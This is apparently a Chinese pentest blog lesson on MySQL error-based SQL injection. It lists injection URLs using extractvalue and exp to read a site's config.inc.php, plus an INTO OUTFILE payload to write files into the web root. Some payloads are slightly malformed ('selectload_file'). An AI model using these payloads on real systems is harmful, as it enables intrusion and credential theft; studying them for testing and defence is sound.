欢迎来到【血梦博客】 今天是:2020年08月09日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:报错注入读取文件

WEB安全之SQL注入:报错注入读取文件

作者:血梦 日期:2020-03-18 浏览:102分类: 渗透测试 已提交百度收录

上一课 给大家讲解了 mysql报错注入 其实他还有一些用法

例如读取文件

extractvalue读取文件

http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(selectload_file('C:\\inetpub\\wwwroot\\target_sys.com\\data\\config.inc.php')),0x7e)))



exp方法读取

http://target_sys.com/mysqlinj.php?id=1 and(exp(~(select*from(selectload_file('C:\\inetpub\\wwwroot\\target_sys.com\\data\\config.inc.php'))a)));

写文件

http://target_sys.com/mysqlinj.php?id=-1 and  exp(~(select*from(select 'hello')a))into outfile 'C:\\inetpub\\wwwroot\\target_sys.com\\data\\config.inc.txt';




写文件默认就是只能写入0到文件里面 。


1.jpg

关灯